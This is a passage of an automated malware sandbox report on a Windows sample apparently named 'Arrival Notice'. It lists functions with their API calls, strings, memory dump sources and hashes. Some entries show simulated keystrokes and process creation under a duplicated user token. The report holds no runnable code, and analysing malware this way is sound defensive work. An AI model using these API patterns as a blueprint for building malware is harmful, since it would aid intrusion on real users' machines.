Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
Opcode Fuzzy Hash: 87f94661207c863af8b1fc4af8a0b29539e0d831b94eba20ea055568682fb20f
Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A

Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00410DAB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9

Function 0040DF90 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54

Function 0044C0A3 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044C19B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6a38aabddccc6e4e9c083e301e8074d1606bbc09cb33c73b22fab7fe08a78cf2
Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
Opcode Fuzzy Hash: 6a38aabddccc6e4e9c083e301e8074d1606bbc09cb33c73b22fab7fe08a78cf2
Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99

Function 00403910 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4

Function 0044C1B5 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_memmove.LIBCMT ref: 0044C1F2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4

Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00414CC6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __lock_file
String ID:
API String ID: 3031932315-0
Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9

Function 004142B6 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004142F5

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99

Function 00432017 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00432041

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99

Function 0040E050 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5

Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 004149CF

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689

Function 03C622E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03C622F9

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c7adc9cf6206a9cf5130b34bcecd2389cd15eec1612368ed08c51a4ac9ad1ce5
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 13E0E67494010DDFDB00DFB8D54D69D7BB4EF04301F1005A1FD01D2280D7309D508A72

Non-executed Functions

Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
GetKeyState.USER32(00000011), ref: 0047C92D
GetKeyState.USER32(00000009), ref: 0047C936
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
GetKeyState.USER32(00000010), ref: 0047C953
GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
_wcsncpy.LIBCMT ref: 0047CA29
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
SendMessageW.USER32 ref: 0047CA7F
InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
ImageList_SetDragCursorImage.COMCTL32(00AD0E00,00000000,00000000,00000000), ref: 0047CB9B
ImageList_BeginDrag.COMCTL32(00AD0E00,00000000,000000F8,000000F0), ref: 0047CBAC
SetCapture.USER32(?), ref: 0047CBB6
ClientToScreen.USER32(?,?), ref: 0047CC17
ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
ReleaseCapture.USER32 ref: 0047CC3A
GetCursorPos.USER32(?), ref: 0047CC72
ScreenToClient.USER32(?,?), ref: 0047CC80
SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
SendMessageW.USER32 ref: 0047CD12
SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
SendMessageW.USER32 ref: 0047CD80
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
GetCursorPos.USER32(?), ref: 0047CDC8
ScreenToClient.USER32(?,?), ref: 0047CDD6
GetParent.USER32(00000000), ref: 0047CDF7
SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
SendMessageW.USER32 ref: 0047CE93
ClientToScreen.USER32(?,?), ref: 0047CEEE
TrackPopupMenuEx.USER32(?,00000000,?,?,02FA1C60,00000000,?,?,?,?), ref: 0047CF1C
SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
SendMessageW.USER32 ref: 0047CF6B
ClientToScreen.USER32(?,?), ref: 0047CFB5
TrackPopupMenuEx.USER32(?,00000080,?,?,02FA1C60,00000000,?,?,?,?), ref: 0047CFE6
GetWindowLongW.USER32(?,000000F0), ref: 0047D086

Strings

@GUI_DRAGID, xrefs: 0047CBE2
F, xrefs: 0047CF71

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3100379633-4164748364
Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A

Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00434420
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
IsIconic.USER32(?), ref: 0043444F
ShowWindow.USER32(?,00000009), ref: 0043445C
SetForegroundWindow.USER32(?), ref: 0043446A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
GetCurrentThreadId.KERNEL32 ref: 00434485
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
SetForegroundWindow.USER32(00000000), ref: 004344B7
MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
keybd_event.USER32(00000012,00000000), ref: 004344CF
MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
keybd_event.USER32(00000012,00000000), ref: 004344E6
MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
keybd_event.USER32(00000012,00000000), ref: 004344FD
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
keybd_event.USER32(00000012,00000000), ref: 00434514
SetForegroundWindow.USER32(00000000), ref: 0043451E
AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545

Strings

Shell_TrayWnd, xrefs: 00434441

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 2889586943-2988720461
Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9

Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON

Download Yara Rule

APIs

DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
CloseHandle.KERNEL32(?), ref: 004463A0
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
GetProcessWindowStation.USER32 ref: 004463D1
SetProcessWindowStation.USER32(00000000), ref: 004463DB
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
_wcslen.LIBCMT ref: 00446498

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_wcsncpy.LIBCMT ref: 004464C0
LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
UnloadUserProfile.USERENV(?,?), ref: 00446555
CloseWindowStation.USER32(00000000), ref: 0044656C
CloseDesktop.USER32(?), ref: 0044657A
SetProcessWindowStation.USER32(?), ref: 00446588
CloseHandle.KERNEL32(?), ref: 00446592
DestroyEnvironmentBlock.USERENV(?), ref: 004465A9

Strings

default, xrefs: 004463F2
, xrefs: 00446348
@OH, xrefs: 00446480
winsta0, xrefs: 004463B3

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
String ID: $@OH$default$winsta0
API String ID: 3324942560-3791954436
Opcode ID: 1bb884a3aaab9660f7068a192c57b32812f4acab3a56684ae30372c532b9dbe9
Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
Opcode Fuzzy Hash: 1bb884a3aaab9660f7068a192c57b32812f4acab3a56684ae30372c532b9dbe9
Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69

Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004096C1

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_memmove.LIBCMT ref: 0040970C

Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
_memmove.LIBCMT ref: 00409D96
_memmove.LIBCMT ref: 0040A6C4
_memmove.LIBCMT ref: 004297E5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
String ID:
API String ID: 2383988440-0
Opcode ID: 3f6b353810eac569563fedced8c2ead9a42502afb1b83146d3e6cee52cd4c640
Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
